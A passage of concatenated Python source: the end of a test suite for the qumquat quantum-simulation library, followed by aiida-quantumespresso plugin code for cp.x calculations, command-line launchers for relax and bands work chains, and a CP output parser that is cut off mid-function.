    x.clean(y)
    y.clean(range(5))
def test_inv():
    # Running a block again under qq.inv() must exactly undo it.
    print("inv")
    x,y = qq.reg(0,1)
    def stuff(x):
        x += 1
        x -= (y+5)//2
        x *= y
        # x *= 0 causes IrrevError
        x -= 2
        x //= 1
        # x //= 2 causes IrrevError
        x ^= (y+1)
    stuff(x)
    qq.print(x)
    with qq.inv(): stuff(x)
    x.clean(0)
    y.clean(1)
def test_if():
    # Quantum-conditioned increments via q_if.
    print("if")
    x = qq.reg([0,1])
    y = qq.reg(0)
    with qq.q_if(x): y += 1
    qq.print(x, y)
    with qq.q_if(x == 0): y += 1
    y.clean(1)
    x.clean([0,1])
def test_quantum():
    print("quantum")
    #### simple quantum teleportation test
    y = qq.reg([-1, 1])
    with qq.q_if(y < 0): qq.phase_pi(1) # Z gate
    # y[-1] now |->
    # Bell state
    x = qq.reg(0)
    x.had(0)
    x.cnot(0,1)
    # cnot across registers
    with qq.q_if(y[-1]): x ^= 1
    # measure
    x_meas = int(qq.measure(x[0]))
    y.had(-1)
    y_meas = int(qq.measure(y[-1]))
    # apply x correction and z correction
    if x_meas: x ^= 2
    with qq.q_if(y_meas & x[1]): qq.phase_pi(1)
    # x[1] is now |->
    x.had(1)
    x.clean(x_meas + 2)
    #### gentle measurement test
    x = qq.reg([-5,5,-2,2])
    out = qq.measure(x**2)
    qq.print(x)
def test_inv_if():
    # Inversion and conditioning must compose in either nesting order.
    print("inv if")
    x, y = qq.reg([0,1], 0)
    with qq.inv():
        with qq.q_if(x):
            y += 1
    with qq.q_if(y):
        with qq.inv():
            x += 1
    qq.print(x,y)
    x.clean(0)
    y.clean([0,-1])
def test_while():
    # q_while loops with loop-counter register l, then inverted to undo.
    print("while")
    x, y, l = qq.reg(1, [10,15,16], 0)
    with qq.q_while(x < y, l): x += 2
    qq.print(x,y,l)
    with qq.inv():
        with qq.q_while(x < y, l): x += 2
    x.clean(1)
    y.clean([10,15,16])
    l.clean(0)
def test_collatz():
    print("collatz")
    # collatz test
    x, l = qq.reg(range(1,11), 0)
    y = qq.reg(x)
    # nested while
    with qq.q_while(x > 1, l):
        tmp = qq.reg(x % 2)
        with qq.q_if(tmp == 0):
            x //= 2
        with qq.q_if(tmp == 1):
            x *= 3
            x += 1
    qq.print(y,l)
def test_order():
    # Period finding: 7^x mod 15 has period 4; inverse QFT exposes it.
    print("order")
    n = 5
    x = qq.reg(range(2**n))
    qq.reg((7**x).int() % 15) # has period 4
    with qq.inv(): x.qft(2**n)
    vals, probs, _ = qq.distribution(x)
    plt.plot(vals,probs)
    plt.show()
def test_garbage_1():
    # Anonymous garbage pile: inverse allocations cancel the forward ones.
    print("garbage 1")
    with qq.garbage():
        x = qq.reg(1)
        y = qq.reg(2)
        x += 1
        with qq.inv():
            xp = qq.reg(1)
            yp = qq.reg(2)
            xp += 1
def test_garbage_2():
    # Named garbage pile via decorator; messy() is later uncomputed.
    print("garbage 2")
    @qq.garbage("test")
    def messy(x):
        out = qq.reg(x)
        for i in [100, 200, 300]:
            with qq.q_while(x*out < i, qq.reg(0)):
                out += 1
        return out
    x = qq.reg([2,4,7,8])
    out = qq.reg(messy(x))
    with qq.inv(): messy(x)
    qq.print(x,out,x*out)
def test_garbage_3():
    # Named piles are independent and may be re-entered across scopes.
    print("garbage 3")
    a = qq.reg(1)
    with qq.garbage("test"):
        x = qq.reg(1)
        x += a
    with qq.garbage("test"):
        y = qq.reg(2)
        z = qq.reg(3)
        y += 3
    with qq.garbage("test-2"):
        y = qq.reg(8)
        y += 2
    with qq.garbage("test"):
        with qq.inv(): qq.reg(2)
        z.clean(3)
    with qq.garbage("test"):
        with qq.inv(): qq.reg(5)
    with qq.garbage("test-2"):
        with qq.inv(): qq.reg(10)
def test_garbage_4():
    # Irreversible assign/bitset require an active garbage pile.
    print("garbage 4")
    x = qq.reg(5)
    with qq.garbage():
        x.assign(3)
        qq.print("assign(3) yields", x)
        with qq.inv(): x.assign(3)
    with qq.garbage():
        qq.print("before bitset",*[x[i] for i in range(-1,3)])
        x[-1] = 1
        x[1] = 1
        qq.print("bitset yields",*[x[i] for i in range(-1,3)])
        with qq.inv():
            x[-1] = 1
            x[1] = 1
def test_garbage_5():
    # Registers allocated inside a q_while body land on the garbage pile.
    print("garbage 5")
    i = qq.reg(0)
    tmp = qq.reg(0)
    with qq.garbage():
        with qq.q_while(i < 4, tmp):
            x = qq.reg(i)
            i += 1
        with qq.inv():
            with qq.q_while(i < 4, tmp):
                x = qq.reg(i)
                i += 1
    i.clean(0)
    tmp.clean(0)
# grover's search on max clique
def grover():
    print("grover")
    n = 8
    # generate a random graph
    import random
    k = 4
    edges = []
    for i in range(n):
        for j in range(i+1,n):
            # NOTE(review): % binds tighter than +, so `j+1 % n` is
            # j + (1 % n) == j + 1, and `i != j+1` always holds here since
            # i < j. Probably `(j+1) % n` was intended to exclude ring
            # edges — confirm before relying on the generated graph.
            if i != j+1 % n:
                edges.append([i,j])
                # if random.random() > 0.5:
    @qq.garbage("oracle")
    def oracle(x):
        # Count clique bits and non-edge violations among selected vertices.
        num_bad = qq.reg(0)
        clique_size = qq.reg(0)
        for i in range(n):
            with qq.q_if(x[i]): clique_size += 1
            for j in range(i+1,n):
                if [i,j] not in edges:
                    with qq.q_if(x[i] & x[j]): num_bad += 1
        return (num_bad == 0) & (clique_size >= k)
    x = qq.reg(range(2**n))
    # One Grover iteration: oracle phase flip, then diffusion about |0>.
    for i in range(1):
        with qq.q_if(oracle(x)): qq.phase_pi(1)
        with qq.inv(): oracle(x)
        for j in range(n): x.had(j)
        with qq.q_if(x == 0): qq.phase_pi(1)
        for j in range(n): x.had(j)
    values, probs, _ = qq.distribution(x)
    plt.bar(values, probs)
    plt.show()
def test_repeated_square():
    print("repeated square")
    @qq.garbage("repsquare")
    def rep_square(b, x, N):
        # Modular exponentiation by repeated squaring: accumulate b^(2^i)
        # terms selected by the bits of x, reducing mod N as we go.
        out = qq.reg(0)
        tmp = qq.reg(b)
        for i in range(5):
            with qq.q_if(x[i]): out += tmp
            tmp **= 2
            tmp %= N
        return out % 13
    x = qq.reg(range(16))
    out = qq.reg(0)
    with qq.garbage():
        out += rep_square(7, x, 13)
        with qq.inv(): rep_square(7, x, 13)
    qq.assert_pile_clean('repsquare')
    qq.print(x,out, 7**x % 13)
def test_for():
    print("for")
    # A reversible for-loop built on q_while: the iteration count is stored
    # in num_iter so the loop variable and scratch can be uncomputed on exit.
    class q_for():
        def __init__(self, i, maxval):
            self.i = i
            self.maxval = maxval
            self.tmp = qq.reg(0) # temporary register
            # compute the number of iterations
            self.num_iter = qq.reg(0)
            with qq.q_if(i < maxval):
                self.num_iter += maxval - i
            self.q_while = qq.q_while(i < maxval, self.tmp)
        def __enter__(self):
            self.q_while.__enter__()
        def __exit__(self, *args):
            self.i += 1
            self.q_while.__exit__()
            # clean the temporary register
            self.tmp.clean(self.num_iter)
            # return i to previous value
            self.i -= self.num_iter
            # uncompute the number of iterations
            with qq.q_if(self.i < self.maxval):
                self.num_iter -= self.maxval - self.i
            self.num_iter.clean(0)
    x = qq.reg([2,3,4,5])
    out = qq.reg(0)
    i = qq.reg(3)
    with q_for(i, x):
        out += i**2
    i.clean(3)
    qq.print(x,out)
def test_qft():
    print("qft")
    for i in range(-10,10,3):
        qq.clear()
        print(i)
        x = qq.reg(i)
        x.qft(4)
        qq.print(x)
def test_postselect():
    print("postselect")
    x = qq.reg(range(42))
    print("postselection success:", qq.postselect(x**3 % 5 == 1))
    qq.print(x)
    qq.clear()
def test_qram():
    # qram lookups from both dict and list storage.
    print("qram")
    d1 = {0: 3, 1: 4, 2: 3}
    d2 = [6,5,2,6,1]
    x = qq.reg([0,1,2])
    qq.print(x, qq.qram(d1,x), qq.qram(d2,x))
def test_rotY():
    print("rotY")
    y = qq.reg(0)
    qq.utils.rotY(y, 0, 2*math.pi*30/360)
    qq.print_amp(y)
    # NOTE(review): this early return skips the amplitude sweep below —
    # looks like a debug leftover; confirm whether the sweep should run.
    return
    ps = []
    n = 91 # should be odd
    for i in range(n):
        y = qq.reg(0)
        qq.utils.rotY(y, 0, 2*math.pi*i/n)
        qq.print_amp(360*i/n, y)
        ps.append(qq.postselect(y == 0))
        y.clean(0)
    plt.bar(range(n), ps)
    plt.plot(range(n), [math.cos(2*math.pi*i/n)**2 for i in range(n)])
    plt.show()
def test_mul_amp():
    # Amplitude multiplication via rotY + postselection on the ancilla.
    print("mul_amp")
    d2 = {0: 0.123, 1:0.567}
    n = 2
    x = qq.reg(range(2))
    y = qq.reg(0)
    qq.utils.rotY(y, 0, (x.qram(d2)).acos())
    qq.print_amp(x, y)
    for i in range(2):
        print(i, d2[i]/math.sqrt(2))
    prob = qq.postselect(y == 0)
    print("ps", prob)
    qq.print_amp(x, y)
    for i in range(2):
        print(i, (1/math.sqrt(prob))*d2[i]/math.sqrt(2))
def test_condinit():
    print("conditional init")
    z = qq.reg([5,6])
    # conditional initialization?
    x = qq.reg([0,1])
    with qq.q_if(x): y = qq.reg([2,3])
    qq.print_amp(x,y)
    with qq.q_if(x): y.clean([2,3])
    x.clean([0,1])
def test_stateprep():
    # State preparation from a dict of amplitudes, conditioned on x.
    print("state prep")
    z = qq.reg([5,6])
    v = {0: 0.5, 1: 0.3}
    x = qq.reg([0,1])
    with qq.q_if(x): y = qq.reg(v)
    qq.print_amp(x,y)
    with qq.q_if(x): y.clean(v)
    x.clean([0,1])
# Run the fast tests when executed as a script. The original guard was
# `if True:`, which also ran the whole suite on import; the standard
# __main__ guard keeps script behavior identical while making the module
# importable.
if __name__ == "__main__":
    test_init()
    test_inv()
    test_if()
    test_quantum()
    test_inv_if()
    test_while()
    test_collatz()
    # test_order() # has plot
    test_garbage_1()
    test_garbage_2()
    test_garbage_3()
    test_garbage_4()
    test_garbage_5()
    # grover() # has plot
    test_repeated_square()
    test_for()
    test_qft()
    test_postselect()
    test_qram()
    test_condinit()
    test_stateprep()
|
[
"/qumquat/__init__.py",
"/qumquat/control.py",
"/qumquat/garbage.py",
"/qumquat/init.py",
"/qumquat/keys.py",
"/qumquat/main.py",
"/qumquat/measure.py",
"/qumquat/primitive.py",
"/qumquat/qvars.py",
"/qumquat/snapshots.py",
"/qumquat/utils.py",
"/tests.py"
] |
00mjk/aiida-quantumespresso
|
# -*- coding: utf-8 -*-
"""Plugin to create a Quantum Espresso pw.x file.
TODO: COPY OUTDIR FROM PREVIOUS CALCULATION! Should be an input node of type
RemoteData (or maybe subclass it?).
TODO: tests!
TODO: DOC + implementation of SETTINGS
TODO: preexec, postexec
TODO: Check that no further parameters are passed in SETTINGS
TODO: many cards missing: check and implement
e.g.: ['CONSTRAINTS', 'OCCUPATIONS']
TODO: implement pre_... and post_... hooks to add arbitrary strings before
and after a namelist, and a 'final_string' (all optional); useful
for development when new cards are needed
TODO: add a lot of logger.debug statements
"""
import os
from aiida import orm
from aiida.common.lang import classproperty
from aiida_quantumespresso.calculations import BasePwCpInputGenerator
class CpCalculation(BasePwCpInputGenerator):
    """`CalcJob` implementation for the cp.x code of Quantum ESPRESSO."""
    # Constants to use in the calculation
    # cp.x reads its restart from FORTRAN unit `ndr` and writes to `ndw`.
    _CP_READ_UNIT_NUMBER = 50
    _CP_WRITE_UNIT_NUMBER = 51
    _FILE_XML_PRINT_COUNTER_BASENAME = 'print_counter.xml'
    # Location of the print counter inside the write-unit .save directory.
    _FILE_XML_PRINT_COUNTER = os.path.join(
        BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
        '{}_{}.save'.format(BasePwCpInputGenerator._PREFIX, _CP_WRITE_UNIT_NUMBER),
        _FILE_XML_PRINT_COUNTER_BASENAME,
    )
    # Input file "sections" that we are going to write by calculation type
    # The term namelist is part of FORTRAN's jargon
    _automatic_namelists = {
        'scf': ['CONTROL', 'SYSTEM', 'ELECTRONS'],
        'nscf': ['CONTROL', 'SYSTEM', 'ELECTRONS'],
        'relax': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS'],
        'cp': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS'],
        'vc-cp': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS', 'CELL'],
        'vc-relax': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS', 'CELL'],
        'vc-wf': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'WANNIER'],
    }
    # Pieces of input that we won't allow users to set
    _blocked_keywords = [
        ('CONTROL', 'pseudo_dir'), # set later
        ('CONTROL', 'outdir'), # set later
        ('CONTROL', 'prefix'), # set later
        ('SYSTEM', 'celldm'),
        ('SYSTEM', 'nat'), # set later
        ('SYSTEM', 'ntyp'), # set later
        ('SYSTEM', 'a'),
        ('SYSTEM', 'b'),
        ('SYSTEM', 'c'),
        ('SYSTEM', 'cosab'),
        ('SYSTEM', 'cosac'),
        ('SYSTEM', 'cosbc'),
        ('CONTROL', 'ndr', _CP_READ_UNIT_NUMBER),
        ('CONTROL', 'ndw', _CP_WRITE_UNIT_NUMBER),
    ]
    # In cp calculations we won't use kpoints data
    _use_kpoints = False
    # Use low verbosity for cp calculations
    _default_verbosity = 'low'
    # Extensions of the per-property output files produced by cp.x.
    _cp_ext_list = [
        'cel',
        'con',
        'eig',
        'evp',
        'for',
        'nos',
        'pol',
        'pos',
        'spr',
        'str',
        'the',
        'vel',
        'wfc',
    ]
    # Files to retrieve after the run: all prefix.<ext> outputs plus the
    # XML print counter.
    _internal_retrieve_list = [
        os.path.join(
            BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
            '{}.{}'.format(BasePwCpInputGenerator._PREFIX, ext),
        ) for ext in _cp_ext_list
    ] + [_FILE_XML_PRINT_COUNTER]
    # in restarts, it will copy from the parent the following
    _restart_copy_from = os.path.join(
        BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
        '{}_{}.save'.format(BasePwCpInputGenerator._PREFIX, _CP_WRITE_UNIT_NUMBER),
    )
    # in restarts, it will copy the previous folder in the following one
    _restart_copy_to = os.path.join(
        BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
        '{}_{}.save'.format(BasePwCpInputGenerator._PREFIX, _CP_READ_UNIT_NUMBER),
    )
    @classproperty
    def xml_filepaths(cls):
        """Return a list of relative filepaths of XML files."""
        # pylint: disable=no-self-argument,not-an-iterable
        filepaths = []
        for filename in cls.xml_filenames:
            filepath = os.path.join(
                cls._OUTPUT_SUBFOLDER,
                '{}_{}.save'.format(cls._PREFIX, cls._CP_WRITE_UNIT_NUMBER),
                filename,
            )
            filepaths.append(filepath)
        return filepaths
    @classmethod
    def define(cls, spec):
        """Define the process specification."""
        # yapf: disable
        super().define(spec)
        spec.input('metadata.options.parser_name', valid_type=str, default='quantumespresso.cp')
        spec.output('output_trajectory', valid_type=orm.TrajectoryData)
        spec.output('output_parameters', valid_type=orm.Dict)
        spec.default_output_node = 'output_parameters'
        spec.exit_code(300, 'ERROR_NO_RETRIEVED_FOLDER',
            message='The retrieved folder data node could not be accessed.')
        spec.exit_code(301, 'ERROR_NO_RETRIEVED_TEMPORARY_FOLDER',
            message='The retrieved temporary folder could not be accessed.')
        spec.exit_code(303, 'ERROR_MISSING_XML_FILE',
            message='The required XML file is not present in the retrieved folder.')
        spec.exit_code(304, 'ERROR_OUTPUT_XML_MULTIPLE',
            message='The retrieved folder contains multiple XML files.')
        spec.exit_code(310, 'ERROR_OUTPUT_STDOUT_READ',
            message='The stdout output file could not be read.')
        spec.exit_code(311, 'ERROR_OUTPUT_STDOUT_PARSE',
            message='The output file contains invalid output.')
        spec.exit_code(312, 'ERROR_OUTPUT_STDOUT_INCOMPLETE',
            message='The stdout output file was incomplete probably because the calculation got interrupted.')
        spec.exit_code(320, 'ERROR_OUTPUT_XML_READ',
            message='The required XML file could not be read.')
        spec.exit_code(330, 'ERROR_READING_POS_FILE',
            message='The required POS file could not be read.')
        spec.exit_code(340, 'ERROR_READING_TRAJECTORY_DATA',
            message='The required trajectory data could not be read.')
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Command line scripts to launch a `PwBandsWorkChain` for testing and demonstration purposes."""
import click
from aiida.cmdline.params import options as options_cli
from aiida.cmdline.params import types
from aiida.cmdline.utils import decorators
from ...utils import launch
from ...utils import options as options_qe
from ...utils import validate
from .. import cmd_launch
@cmd_launch.command('pw-bands')
@options_cli.CODE(required=True, type=types.CodeParamType(entry_point='quantumespresso.pw'))
@options_qe.STRUCTURE(required=True)
@options_qe.PSEUDO_FAMILY(required=True)
@options_qe.KPOINTS_DISTANCE()
@options_qe.ECUTWFC()
@options_qe.ECUTRHO()
@options_qe.HUBBARD_U()
@options_qe.HUBBARD_V()
@options_qe.HUBBARD_FILE()
@options_qe.STARTING_MAGNETIZATION()
@options_qe.SMEARING()
@options_qe.AUTOMATIC_PARALLELIZATION()
@options_qe.CLEAN_WORKDIR()
@options_qe.MAX_NUM_MACHINES()
@options_qe.MAX_WALLCLOCK_SECONDS()
@options_qe.WITH_MPI()
@options_qe.DAEMON()
@decorators.with_dbenv()
def launch_workflow(
    code, structure, pseudo_family, kpoints_distance, ecutwfc, ecutrho, hubbard_u, hubbard_v, hubbard_file_pk,
    starting_magnetization, smearing, automatic_parallelization, clean_workdir, max_num_machines, max_wallclock_seconds,
    with_mpi, daemon
):
    """Run a `PwBandsWorkChain`."""
    # pylint: disable=too-many-statements
    from aiida.orm import Bool, Float, Str, Dict
    from aiida.plugins import WorkflowFactory
    from aiida_quantumespresso.utils.resources import get_default_options, get_automatic_parallelization_options

    builder = WorkflowFactory('quantumespresso.pw.bands').get_builder()

    # Base `pw.x` input parameters; the validators below may add Hubbard, magnetization
    # and smearing keys to this dictionary in place.
    parameters = {
        'SYSTEM': {
            'ecutwfc': ecutwfc,
            'ecutrho': ecutrho,
        },
    }

    # Validate interdependent CLI options, converting failures into proper click usage
    # errors; chain the original exception so the full context is preserved.
    try:
        hubbard_file = validate.validate_hubbard_parameters(
            structure, parameters, hubbard_u, hubbard_v, hubbard_file_pk
        )
    except ValueError as exception:
        raise click.BadParameter(str(exception)) from exception

    try:
        validate.validate_starting_magnetization(structure, parameters, starting_magnetization)
    except ValueError as exception:
        raise click.BadParameter(str(exception)) from exception

    try:
        validate.validate_smearing(parameters, smearing)
    except ValueError as exception:
        raise click.BadParameter(str(exception)) from exception

    # The same nodes are reused across the three sub-work-chain namespaces.
    pseudo_family = Str(pseudo_family)
    parameters = Dict(dict=parameters)

    builder.structure = structure
    builder.relax.base.pw.code = code
    builder.relax.base.pw.parameters = parameters
    builder.relax.base.pseudo_family = pseudo_family
    builder.relax.base.kpoints_distance = Float(kpoints_distance)
    builder.relax.meta_convergence = Bool(False)
    builder.scf.pw.code = code
    builder.scf.pw.parameters = parameters
    builder.scf.pseudo_family = pseudo_family
    builder.scf.kpoints_distance = Float(kpoints_distance)
    builder.bands.pw.code = code
    builder.bands.pw.parameters = parameters
    builder.bands.pseudo_family = pseudo_family

    if hubbard_file:
        # The `scf` and `bands` namespaces expose the `pw` inputs directly (see the
        # `builder.scf.pw.*` / `builder.bands.pw.*` assignments above), so the Hubbard
        # file goes under `<namespace>.pw.hubbard_file` — there is no `.base` level there.
        builder.relax.base.pw.hubbard_file = hubbard_file
        builder.scf.pw.hubbard_file = hubbard_file
        builder.bands.pw.hubbard_file = hubbard_file

    if automatic_parallelization:
        auto_para = Dict(dict=get_automatic_parallelization_options(max_num_machines, max_wallclock_seconds))
        builder.relax.base.automatic_parallelization = auto_para
        builder.scf.automatic_parallelization = auto_para
        builder.bands.automatic_parallelization = auto_para
    else:
        options = get_default_options(max_num_machines, max_wallclock_seconds, with_mpi)
        builder.relax.base.pw.metadata.options = options
        builder.scf.pw.metadata.options = options
        builder.bands.pw.metadata.options = options

    if clean_workdir:
        builder.clean_workdir = Bool(True)

    launch.launch_process(builder, daemon)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Command line scripts to launch a `PwRelaxWorkChain` for testing and demonstration purposes."""
import click
from aiida.cmdline.params import options, types
from aiida.cmdline.utils import decorators
from ...utils import launch
from ...utils import options as options_qe
from ...utils import validate
from .. import cmd_launch
@cmd_launch.command('pw-relax')
@options.CODE(required=True, type=types.CodeParamType(entry_point='quantumespresso.pw'))
@options_qe.STRUCTURE(required=True)
@options_qe.PSEUDO_FAMILY(required=True)
@options_qe.KPOINTS_DISTANCE()
@options_qe.ECUTWFC()
@options_qe.ECUTRHO()
@options_qe.HUBBARD_U()
@options_qe.HUBBARD_V()
@options_qe.HUBBARD_FILE()
@options_qe.STARTING_MAGNETIZATION()
@options_qe.SMEARING()
@options_qe.AUTOMATIC_PARALLELIZATION()
@options_qe.CLEAN_WORKDIR()
@options_qe.MAX_NUM_MACHINES()
@options_qe.MAX_WALLCLOCK_SECONDS()
@options_qe.WITH_MPI()
@options_qe.DAEMON()
@click.option(
    '-f',
    '--final-scf',
    is_flag=True,
    default=False,
    show_default=True,
    help='Run a final scf calculation for the final relaxed structure.'
)
@decorators.with_dbenv()
def launch_workflow(
    code, structure, pseudo_family, kpoints_distance, ecutwfc, ecutrho, hubbard_u, hubbard_v, hubbard_file_pk,
    starting_magnetization, smearing, automatic_parallelization, clean_workdir, max_num_machines, max_wallclock_seconds,
    with_mpi, daemon, final_scf
):
    """Run a `PwRelaxWorkChain`."""
    from aiida.orm import Bool, Float, Str, Dict
    from aiida.plugins import WorkflowFactory
    from aiida_quantumespresso.utils.resources import get_default_options, get_automatic_parallelization_options

    builder = WorkflowFactory('quantumespresso.pw.relax').get_builder()

    # Base `pw.x` input parameters; the validators below may add Hubbard, magnetization
    # and smearing keys to this dictionary in place.
    parameters = {
        'SYSTEM': {
            'ecutwfc': ecutwfc,
            'ecutrho': ecutrho,
        },
    }

    # Validate interdependent CLI options, converting failures into proper click usage
    # errors; chain the original exception so the full context is preserved.
    try:
        hubbard_file = validate.validate_hubbard_parameters(
            structure, parameters, hubbard_u, hubbard_v, hubbard_file_pk
        )
    except ValueError as exception:
        raise click.BadParameter(str(exception)) from exception

    try:
        validate.validate_starting_magnetization(structure, parameters, starting_magnetization)
    except ValueError as exception:
        raise click.BadParameter(str(exception)) from exception

    try:
        validate.validate_smearing(parameters, smearing)
    except ValueError as exception:
        raise click.BadParameter(str(exception)) from exception

    builder.structure = structure
    builder.base.pseudo_family = Str(pseudo_family)
    builder.base.kpoints_distance = Float(kpoints_distance)
    builder.base.pw.code = code
    builder.base.pw.parameters = Dict(dict=parameters)

    if hubbard_file:
        builder.base.pw.hubbard_file = hubbard_file

    if automatic_parallelization:
        automatic_parallelization = get_automatic_parallelization_options(max_num_machines, max_wallclock_seconds)
        builder.base.automatic_parallelization = Dict(dict=automatic_parallelization)
    else:
        builder.base.pw.metadata.options = get_default_options(max_num_machines, max_wallclock_seconds, with_mpi)

    if clean_workdir:
        builder.clean_workdir = Bool(True)

    if final_scf:
        builder.final_scf = Bool(True)

    launch.launch_process(builder, daemon)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from aiida.common import OutputParsingError
class QEOutputParsingError(OutputParsingError):
    """Exception raised when there is a parsing error in the QE parser."""
def get_parser_info(parser_info_template=None):
    """Return a template dictionary with details about the parser such as the version.

    :param parser_info_template: template string with single placeholder to be replaced by current version number
    :returns: dictionary with parser name, version and empty list for warnings
    """
    import aiida_quantumespresso

    version = aiida_quantumespresso.__version__

    if parser_info_template is None:
        description = 'aiida-quantumespresso parser v{}'.format(version)
    else:
        description = parser_info_template.format(version)

    return {
        'parser_warnings': [],
        'parser_version': version,
        'parser_info': description,
    }
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from distutils.version import LooseVersion
import numpy
from aiida.common import NotExistent
from aiida.orm import Dict, TrajectoryData
from qe_tools import CONSTANTS
from aiida_quantumespresso.parsers.parse_raw.cp import parse_cp_raw_output, parse_cp_traj_stanzas
from .base import Parser
class CpParser(Parser):
    """This class is the implementation of the Parser class for Cp."""

    def parse(self, **kwargs):
        """Receives in input a dictionary of retrieved nodes.

        Does all the logic here.

        Parses the stdout, the XML data file, the XML print counter and the trajectory
        files (``.pos``, ``.cel``, ``.vel``, ``.evp``) produced by a ``cp.x`` run, and
        emits an ``output_trajectory`` (TrajectoryData) and ``output_parameters`` (Dict)
        output node, or returns an exit code on failure.
        """
        try:
            out_folder = self.retrieved
        except NotExistent:
            return self.exit(self.exit_codes.ERROR_NO_RETRIEVED_FOLDER)

        # check what is inside the folder
        list_of_files = out_folder._repository.list_object_names()

        # options.metadata become attributes like this:
        stdout_filename = self.node.get_attribute('output_filename')

        # at least the stdout should exist
        if stdout_filename not in list_of_files:
            return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)

        # This should match 1 file
        xml_files = [xml_file for xml_file in self.node.process_class.xml_filenames if xml_file in list_of_files]
        if not xml_files:
            return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
        elif len(xml_files) > 1:
            return self.exit(self.exit_codes.ERROR_OUTPUT_XML_MULTIPLE)

        # the print counter is required to interpret the XML data
        if self.node.process_class._FILE_XML_PRINT_COUNTER_BASENAME not in list_of_files:
            self.logger.error('We could not find the print counter file in the output')
            # TODO: Add an error for this counter
            return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)

        output_stdout = out_folder.get_object_content(stdout_filename)
        output_xml = out_folder.get_object_content(xml_files[0])
        output_xml_counter = out_folder.get_object_content(self.node.process_class._FILE_XML_PRINT_COUNTER_BASENAME)
        out_dict, _raw_successful = parse_cp_raw_output(output_stdout, output_xml, output_xml_counter)

        # parse the trajectory. Units in Angstrom, picoseconds and eV.
        # append everything in the temporary dictionary raw_trajectory
        raw_trajectory = {}
        # scalar per-step quantities parsed from the .evp file and attached as arrays below
        evp_keys = [
            'electronic_kinetic_energy', 'cell_temperature', 'ionic_temperature', 'scf_total_energy', 'enthalpy',
            'enthalpy_plus_kinetic', 'energy_constant_motion', 'volume', 'pressure'
        ]

        # Now prepare the reordering, as files in the xml are ordered
        reordering = self._generate_sites_ordering(out_dict['species'], out_dict['atoms'])

        pos_filename = '{}.{}'.format(self.node.process_class._PREFIX, 'pos')
        if pos_filename not in list_of_files:
            return self.exit(self.exit_codes.ERROR_READING_POS_FILE)

        # (array name, file extension, scale factor to target units, rows per stanza)
        trajectories = [
            ('positions', 'pos', CONSTANTS.bohr_to_ang, out_dict['number_of_atoms']),
            ('cells', 'cel', CONSTANTS.bohr_to_ang, 3),
            (
                'velocities', 'vel', CONSTANTS.bohr_to_ang / CONSTANTS.timeau_to_sec * 10**12,
                out_dict['number_of_atoms']
            ),
        ]

        for name, extension, scale, elements in trajectories:
            try:
                with out_folder.open('{}.{}'.format(self.node.process_class._PREFIX, extension)) as datafile:
                    data = [l.split() for l in datafile]
                # POSITIONS stored in angstrom
                traj_data = parse_cp_traj_stanzas(
                    num_elements=elements, splitlines=data, prepend_name='{}_traj'.format(name), rescale=scale
                )
                # here initialize the dictionary. If the parsing of positions fails, though, I don't have anything
                # out of the CP dynamics. Therefore, the calculation status is set to FAILED.
                if extension != 'cel':
                    # CP prints atoms grouped by species: map rows back to the input site order
                    raw_trajectory['{}_ordered'.format(name)] = self._get_reordered_array(
                        traj_data['{}_traj_data'.format(name)], reordering
                    )
                else:
                    raw_trajectory['cells'] = numpy.array(traj_data['cells_traj_data'])
                if extension == 'pos':
                    raw_trajectory['times'] = numpy.array(traj_data['{}_traj_times'.format(name)])
            except IOError:
                out_dict['warnings'].append('Unable to open the {} file... skipping.'.format(extension.upper()))

        # =============== EVP trajectory ============================
        try:
            # NOTE(review): `self._node` is used here while the rest of the method uses the
            # `self.node` property — presumably equivalent; confirm and unify.
            with out_folder.open('{}.evp'.format(self._node.process_class._PREFIX)) as handle:
                matrix = numpy.genfromtxt(handle)
            # there might be a different format if the matrix has one row only
            try:
                matrix.shape[1]
            except IndexError:
                matrix = numpy.array(numpy.matrix(matrix))

            if LooseVersion(out_dict['creator_version']) > LooseVersion('5.1'):
                # Between version 5.1 and 5.1.1, someone decided to change
                # the .evp output format, without any way to know that this
                # happened... SVN commit 11158.
                # I here use the version number to parse, plus some
                # heuristics to check that I'm doing the right thing
                #print "New version"
                raw_trajectory['steps'] = numpy.array(matrix[:, 0], dtype=int)
                raw_trajectory['evp_times'] = matrix[:, 1]  # TPS, ps
                raw_trajectory['electronic_kinetic_energy'] = matrix[:, 2] * CONSTANTS.hartree_to_ev  # EKINC, eV
                raw_trajectory['cell_temperature'] = matrix[:, 3]  # TEMPH, K
                raw_trajectory['ionic_temperature'] = matrix[:, 4]  # TEMPP, K
                raw_trajectory['scf_total_energy'] = matrix[:, 5] * CONSTANTS.hartree_to_ev  # ETOT, eV
                raw_trajectory['enthalpy'] = matrix[:, 6] * CONSTANTS.hartree_to_ev  # ENTHAL, eV
                raw_trajectory['enthalpy_plus_kinetic'] = matrix[:, 7] * CONSTANTS.hartree_to_ev  # ECONS, eV
                raw_trajectory['energy_constant_motion'] = matrix[:, 8] * CONSTANTS.hartree_to_ev  # ECONT, eV
                raw_trajectory['volume'] = matrix[:, 9] * (CONSTANTS.bohr_to_ang**3)  # volume, angstrom^3
                raw_trajectory['pressure'] = matrix[:, 10]  # out_press, GPa
            else:
                #print "Old version"
                raw_trajectory['steps'] = numpy.array(matrix[:, 0], dtype=int)
                raw_trajectory['electronic_kinetic_energy'] = matrix[:, 1] * CONSTANTS.hartree_to_ev  # EKINC, eV
                raw_trajectory['cell_temperature'] = matrix[:, 2]  # TEMPH, K
                raw_trajectory['ionic_temperature'] = matrix[:, 3]  # TEMPP, K
                raw_trajectory['scf_total_energy'] = matrix[:, 4] * CONSTANTS.hartree_to_ev  # ETOT, eV
